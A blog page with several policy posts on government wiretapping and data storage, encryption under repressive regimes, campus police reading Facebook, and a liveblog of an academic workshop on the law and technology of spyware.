October 31, 2024

Twenty-First Century Wiretapping: Recording

Yesterday I started a thread on new wiretapping technologies, and their policy implications. Today I want to talk about how we should deal with the ability of governments to record and store huge numbers of intercepted messages.

In the old days, before there were huge, cheap digital storage devices, government would record an intercepted message only if it was likely to listen to that message eventually. Human analysts’ time was scarce, but recording media were relatively scarce too. The cost of storage tended to limit the amount of recording.

Before too much longer, Moore’s Law will enable government to record every email and phone call it knows about, and to keep the recordings forever. The cost of storage will no longer be a factor. Indeed, if storage is free but analysts’ time is costly, then the cost-minimizing strategy is to record everything and sort it out later, rather than spending analyst time figuring out what to record. Cost is minimized by doing lots of recording.

Of course the government’s cost is not the only criterion that wiretap policy should consider. We also need to consider the effect on citizens.

Any nontrivial wiretap policy will sometimes eavesdrop on innocent citizens. Indeed, there is a plausible argument that a well-designed wiretap policy will mostly eavesdrop on innocent citizens. If we knew in advance, with certainty, that a particular communication would be part of a terrorist plot, then of course we would let government listen to that communication. But such certainty only exists in hypotheticals. In practice, the best we can hope for is that, based on the best available information, there is some known probability that the message will be part of a terrorist plot. If that probability is just barely less than 100%, we’ll be comfortable allowing eavesdropping on that message. If the probability is infinitesimal, we won’t allow eavesdropping. Somewhere in the middle there is a threshold probability, just high enough that we’re willing to allow eavesdropping. We’ll make the decision by weighing the potential benefit of hearing the bad guys’ conversations, against the costs and harms imposed by wiretapping, in light of the probability that we’ll overhear real bad guys. The key point here is that even the best wiretap policy will sometimes listen in on innocent people.

(For now, I’m assuming that “we” have access to the best possible information, so that “we” can make these decisions. In practice the relevant information may be closely held (perhaps with good reason) and it matters greatly who does the deciding. I know these issues are important. But please humor me and let me set them aside for a bit longer.)

The drawbacks of wiretapping come in several flavors:
(1) Cost: Wiretapping costs money.
(2) Mission Creep: The scope of wiretapping programs (arguably) tends to increase over time, so today’s reasonable, well-balanced program will lead to tomorrow’s overreach.
(3) Abuse: Wiretaps can be (and have been) misused, by improperly spying on innocent people such as political opponents of the wiretappers, and by misusing information gleaned from wiretaps.
(4) Privacy Threat: Ordinary citizens will feel less comfortable and will feel compelled to speak more cautiously, due to the knowledge that wiretappers might be listening.

Cheap, high capacity storage reduces the first drawback (cost) but increases all the others. The risk of abuse seems particularly serious. If government stores everything from now on, corrupt government officials, especially a few years down the road, will have tremendous power to peer into the lives of people they don’t like.

This risk is reason enough to insist that recording be limited, and that there be procedural safeguards against overzealous recording. What limits and safeguards are appropriate? That’s the topic of my next post.

Twenty-First Century Wiretapping

The revelation that the National Security Agency has been wiretapping communications crossing the U.S. border (and possibly within the U.S.), without warrants, has started many angry conversations across the country, and rightly so. Here is an issue that challenges our most basic conception of the purposes of government and its relation to citizens.

Today I am starting a series of posts about this issue. Most discussions of the wiretap program focus on two questions: (1) Is the program legal? and (2) Regardless of its legality, does the program, as currently executed, serve our national interest (bearing in mind the national interest in both national security and citizens’ privacy)? These questions are surely important, but I want to set them aside here. I’m setting aside the legal question because it’s outside my expertise. I’m setting aside any evaluation of the current program for two reasons. First, we don’t know the exact scope of the current wiretap program. Second, most people – on both sides – think the second question is an easy one, and easy questions lead to boring conversations.

I want to focus instead on the more basic questions of what the extent of national security wiretapping should be, and why. The why question is especially important.

The first thing to realize is that this is not your parents’ wiretap debate. Though the use (and sometimes misuse) of wiretapping has long been a contentious issue, the terms of the debate have changed. I’m not referring here to the claim that 9/11 changed everything. What I mean is that wiretapping technology has changed in ways that ought to reframe the debate.

Two technology changes are important. The first is the dramatic drop in the cost of storage, making it economical to record vast amounts of communications traffic. The second technology change is the use of computer algorithms to analyze intercepted communications. Traditionally, a wiretap would be heard (or read) immediately by a person, or recorded for later listening by a person. Today computer algorithms can sift through intercepted communications, looking for sophisticated patterns, and can select certain items to be recorded or heard by a person.

Both changes are driven by Moore’s Law, the rule of thumb that the capability of digital technologies doubles every eighteen months or, equivalently, improves by a factor of 100 every ten years. This means that in 2016 government will be able to store 100 times more intercepted messages, and will be able to devote 100 times more computing capability to its analysis algorithms, compared to today. If the new world of wiretapping has not entirely arrived, it will be here before long.

So government will have greater eavesdropping capabilities and, more interestingly, it will have different capabilities. How should we respond? Surely it is not right simply to let government do whatever it wants – this has never been our policy. Nor can it be right to let government do no wiretapping at all – this has not been our policy either. What we need to understand is where to draw the line, and what kind of oversight and safeguards we need to keep our government near the line we have drawn. I hope that the next several posts can shed some small amount of light on these questions.

Guns vs. Random Bits

Last week Tim Wu gave an interesting lecture here at Princeton – the first in our infotech policy lecture series – entitled “Who Controls the Internet?”, based on his recent book of the same title, co-authored with Jack Goldsmith. In the talk, Tim argued that national governments will have a larger role than most people think, for good or ill, in the development and use of digital technologies.

Governments have always derived power from their ability to use force against their citizens. Despite claims that digital technologies would disempower government, Tim argued that it is now becoming clear that governments have the same sort of power they have always had. He argued that technology doesn’t open borders as widely as you might think.

An illustrative example is the Great Firewall of China. The Chinese government has put in place technologies to block their citizens’ access to certain information and to monitor their citizens’ communications. There are privacy-enhancing technologies that could give Chinese citizens access to the open Web and allow them to communicate privately. For example, they could encrypt all of their Internet traffic and pass it through a chain of intermediaries, so that all the government monitors saw was a stream of encrypted bits.

Such technologies work as a technical matter, but they don’t provide much comfort in practice, because people know that using such technologies – conspicuously trafficking in encrypted data – could lead to a visit from the police. Guns trump ciphers.

At the end of the lecture, Tim Lee (who happened to be in town) asked an important question: how much do civil liberties change this equation? If government can arbitrarily punish citizens, then it can deter the use of privacy-enhancing technologies. But are limits on government power, such as the presumption of innocence and limits on search and seizure, enough to turn the tables in practice?

From a technology standpoint, the key issue is whether citizens have the right to send and receive random (or random-looking) bits, without being compelled to explain what they are really doing. Any kind of private or anonymous communication can be packaged, via encryption, to look like random bits, so the right to communicate random bits (plus the right to use a programmable computer to pre- and post-process messages) gives people the ability to communicate out of the view of government.

My sense is that civil liberties, including the right to communicate random bits, go a long way in empowering citizens to communicate out of the view of government. It stands to reason that people who are more free offline will be tend to be more free online as well.

Which raises another question that Tim Wu didn’t have time to address at any length: can a repressive country walk the tightrope by retaining control over its citizens’ access to political information and debate, while giving them enough autonomy online to reap the economic benefits of the Net? Tim hinted that he thought the answer might be yes. I’m looking forward to reading “Who Controls the Internet?” to see more discussion of this point.

Facebook and the Campus Cops

An interesting mini-controversy developed at Princeton last week over the use of the Facebook.com web site by Princeton’s Public Safety officers (i.e., the campus police).

If you’re not familiar with Facebook, you must not be spending much time on a college campus. Facebook is a sort of social networking site for college students, faculty and staff (but mostly students). You can set up a home page with your picture and other information about you. You can make links to your friends’ pages, by mutual consent. You can post photos on your page. You can post comments on your friends’ pages. You can form groups based on some shared interest, and people can join the groups.

The controversy started with a story in the Daily Princetonian revealing that Public Safety had used Facebook in two investigations. In one case, a student’s friend posted a photo of the student that was taken during a party in the student’s room. The photo reportedly showed the student hosting a dorm-room party where alcohol was served, which is a violation of campus rules. In another case, there was a group of students who liked to climb up the sides of buildings on campus. They had set up a building-climbers’ group on Facebook, and Public Safety reportedly used the group to identify the group’s members, so as to have Serious Discussions with them.

Some students reacted with outrage, seeing this as an invasion of privacy and an unfair tactic by Public Safety. I find this reaction really interesting.

Students who stop to think about how Facebook works will realize that it’s not very private. Anybody with a princeton.edu email address can get an account on the Princeton Facebook site and view pages. That’s a large group, including current students, alumni, faculty, and staff. (Public Safety officers are staff members.)

And yet students seem to think of Facebook as somehow private, and they continue to post lots of private information on the site. A few weeks ago, I surfed around the site at random. Within two or three minutes I spotted Student A’s page saying, in a matter of fact way, that Student A had recently slept with Student B. Student B’s page confirmed this event, and described what it was like. Look around on the site and you’ll see many descriptions of private activities, indiscretions, and rule-breaking.

I have to admit that I find this pretty hard to understand. Regular readers of this blog know that I reveal almost nothing about my personal life. If you have read carefully over the last three and a half years, you have learned that I live in the Princeton area, am married, and have at least one child (of unspecified age(s)). Not exactly tabloid material. Some bloggers say more – a lot more – but I am more comfortable this way. Anyway, if I did write about my personal life, I would expect that everybody in the world would find out what I wrote, assuming they cared.

It’s easy to see why Public Safety might be interested in reading Facebook, and why students might want to keep Public Safety away. In the end, Public Safety stated that it would not hunt around randomly on Facebook, but it would continue to use Facebook as a tool in specific investigations. Many people consider this a reasonable compromise. It feels right to me, though I can’t quite articulate why.

Expect this to become an issue on other campuses too.

NYU/Princeton Spyware Workshop Liveblog

Today I’m at the NYU/Princeton spyware workshop. I’ll be liveblogging the workshop here. I won’t give you copious notes on what each speaker says, just a list of things that strike me as interesting. Videos of the presentations will be available on the net eventually.

I gave a basic tutorial on spyware last night, to kick off the workshop.

The first panel today is officially about the nature of the spyware problem, but it’s shaping up as the law enforcement panel. The first speaker is Mark Eckenwiler from the U.S. Department of Justice. He is summarizing the various Federal statutes that can be used against spyware purveyors, including statutes against wiretapping and computer intrusions. One issue I hadn’t heard before involves how to prove that a particular spyware purveyor caused harm, if the victim’s computer was also infected with lots of other spyware from other sources.

Second speaker is Eileen Harrington of the Federal Trade Commission. The FTC has two main roles here: to enforce laws, especially relating to unfair and deceptive business practices, and to run hearings and study issues. In 1995 the FTC ran a series of hearing on online consumer protection, which identified privacy as important but didn’t identify spam or spyware. In recent years their focus has shifted more toward spyware. FTC enforcement is based on three principles: the computer belongs to the consumer; disclosure can’t be buried in a EULA; and software must be reasonably removable. These seem sensible to me. She recommends a consumer education website created by the FTC and other government agencies.

Third speaker is Justin Brookman of the New York Attorney General’s office. To them, consent is the biggest issue. He is skeptical of state spyware laws, saying they are often too narrow and require high level of intent to be proven for civil liability. Instead, they enforce based on laws against deceptive business practices and false advertising, and on trespass to chattels. They focus on the consumer experience, and don’t always need to dig very deeply into all of the technical details. He says music lyric sites are often spyware-laden. In one case, a screen saver came with a 188-page EULA, which mentioned the included adware on page 131. He raises the issue of when companies are responsible for what their “affiliates” do.

Final speaker of the first panel is Ari Schwartz of CDT, who runs the Anti-Spyware Coalition. ASC is a big coalition of public-interest groups, companies, and others to build consensus around a definition of spyware and principles for dealing with it. The definition problem is both harder and more important than you might think. The goal was to create a broadly accepted definition, to short-circuit debates about whether particular pieces of unpleasant software are or are not spyware. He says that many of the harms caused by software are well addressed by existing law (identity theft, extortion, corporate espionage, etc.), but general privacy invasions are not. In what looks like a recurring theme for the workshop, he talks about how spyware purveyors use intermediaries (“affiliates”) to create plausible deniability. He shows a hair-raising chain of emails obtained in discovery in an FTC case against Sanford Wallace and associates. This was apparently an extortion-type scheme, where extreme spyware was locked on to a user’s computer, and the antidote was sold to users for $30.

Question to the panel about what happens if the perpetrator is overseas. Eileen Harrington says that if there are money flows, they can freeze assets or sometimes get money repatriated for overseas. The FTC wants statutory changes to foster information exchange with other governments. Ari Schwartz says advertisers, ad agencies, and adware makers are mostly in the U.S. Distribution of software is sometimes from the U.S., sometimes from Eastern Europe, former Soviet Union, or Asia.

Q&A discussion of how spyware programs attack each other. Justin Brookman talks about a case where one spyware company sued another spyware company over this.

The second panel is on “motives, incentives, and causes”. It’s two engineers and two lawyers. First is Eric Allred, an engineer from Microsoft’s antispyware group. “Why is this going on? For the money.”

Eric talks about game programs that use spyware tactics to fight cheating code, e.g. the “warden” in World of Warcraft. He talks about products that check quality of service or performance provided by, e.g., network software, by tracking some behaviors. He thinks this is okay with adequate notice and consent.

He takes a poll of the room. Only a few people admit to having their machines infected by spyware – I’ll bet people are underreporting. Most people say that friends have caught spyware.

Second speaker is Markus Jakobsson, an engineer from Indiana University and RavenWhite. He is interested in phishing and pharming, and the means by which sites can gather information about you. As a demonstration, he says his home page tells you where you do your online banking.

He describes an experiment they did that simulated phishing against IU students. Lots of people fell for it. Interestingly, people with political views on the far left or far right were more likely to fall for it than people with more moderate views. The experimental subjects were really mad (but the experiment had proper institutional review board approval).

“My conclusion is that user education does not work.”

Third is Paul Ohm, a law professor at Colorado. He was previously a prosecutor at the DOJ. He talks about the “myth of the superuser”. (I would have said “superattacker”.) He argues that Internet crime policy is wrongly aimed to stop the superuser.

What happens? Congress writes prohibitions that are broad and vague. Prosecutors and civil litigants use the broad language to pursue novel theories. Innocent people get swept in.

He conjectures that most spyware purveyors aren’t technological superuser. In general, he argues that legislation should focus on non-superuser methods and harms.

He talks about the SPYBLOCK Act language, which bans certain actions, if done with certain bad intent. “The FBI agent stops reading after the list of actions.”

Fourth is Marc Rotenberg from EPIC. His talk is structured as a list of observations, presented in random order. I’ll repeat some of them here. (1) People tend to behave opportunistically online – extract information if you can. (2) “Spyware is a crime of architectural opportunity.” (3) Motivations for spyware: money, control, exploitation, investigation.

He argues that cookies are spyware. This is a controversial view. He argues for reimagining cookies or how users can control them.

Q&A session begins. Alex asks Paul Ohm whether it makes sense in the long run to focus on attackers who aren’t super, given that attackers can adapt. Paul says, first, that he hopes technologists will help stop the superattackers. (The myth of the super-defender?) He advocates a more incremental and adaptive approach to drafting the statutes; aim at the 80% case, then adjust every few years.

Question to Marc Rotenberg about what can be done about cookies. Marc says that originally cookies contained, legibly, the information they represented, such as your zip code. But before long cookies morphed into unique identifiers, opaque to the user. Eric Allred points out that the cookies can be strongly, cryptographically opaque to users.

The final session is on solutions. Ben Edelman speaks first. He shows a series of examples of unsavory practices, relating to installation without full consent and to revenue sources for adware.

He shows a scenario where a NetFlix popup ad appears when a user visits blockbuster.com. This happened through a series of intermediaries – seven HTTP redirects – to pop up the ad. Netflix paid LinkShare, LinkShare paid Azoogle, Azoogle paid MyGeek, and MyGeek paid DirectRevenue. He’s got lots of examples like this, from different mainstream ad services.

He shows an example of Google AdSense ads popping up in 180solutions adware popup windows. He says he found 4600+ URLs where this happened (as of last June).

Orin Kerr speaks next. “The purpose of my talk is to suggest that there are no good ways for the law to handle the spyware problem.” He suggests that technical solutions are a better idea. A pattern today: lawyers want to rely more on technical solutions, technologists want to rely more on law.

He says criminal law works best when the person being prosecuted is clearly evil, even to a juror who doesn’t understand much about what happened. He says that spyware purveyors more often operate in a hazy gray area – so criminal prosecution doesn’t look like the right tool.

He says civil suits by private parties may not work, because defendants don’t have deep enough pockets to make serious suits worthwhile.

He says civil suits by government (e.g., the FTC) may not work, because they have weaker investigative powers than criminal investigators, especially against fly-by-night companies.

It seems to me that his arguments mostly rely on the shady, elusive nature of spyware companies. Civil actions may work against large companies that portray themselves as legitimate. So they may have the benefit of driving spyware vendors underground, which could make it harder for them to sell to some advertisers.

Ira Rubinstein of Microsoft is next. His title is “Code Signing As a Spyware Solution”. He describes (the 64-bit version of) Windows Vista, which will require any kernel-mode software to be digitally signed. This is aimed to stop rootkits and other kernel-mode exploits. It sounds quite similar to AuthentiCode, Microsoft’s longstanding signing infrastructure for ActiveX controls.

Mark Miller of HP is the last speaker. His talk starts with an End-User Listening Agreement, in which everyone in the audience must agree that he can read our minds and redistribute what he learns. He says that we’re not concerned about this because it’s infeasible for him to install hostile code into our brains.

He points out that the Solitaire program has the power to read, analyze or transmit any data on the computer. Any other program can do the same. He argues that we need to obey the principle of least privilege. It seems to me that we already have all the tools to do this, but people don’t do it.

He shows an example of how to stop a browser from leaking your secrets, by either not letting it connect to the Net, or not letting it read any local files. But even a simple browser needs to do both. This is not a convincing demo.

In the Q&A, Ben Edelman recommend’s Eric Howes’s web site as a list of which antispyware tools are legit and which are bogus or dangerous.

Orin Kerr is asked whether we should just give up on using the law. He says no, we should use the law to chip away at the problem, but we shouldn’t expect it to solve the problem entirely. Justin Brookman challenges Orin, saying that civil subpoenia power seems to work for Justin’s group at the NY AG office. Orin backtracks slightly but sticks to his basic point that spyware vendors will adapt or evolve into forms more resistant to enforcement.

Alex asks Orin how law and technology might work together to attack the problem. Orin says he doesn’t see a grand solution, just incremental chipping away at the problem. Ira Rubinstein says that law can adjust incentives, to foster adoption of better technology approaches.

And our day draws to a close. All in all, it was a very interesting and thought-provoking discussion. I wish it had been longer – which I rarely say at the end of this kind of event.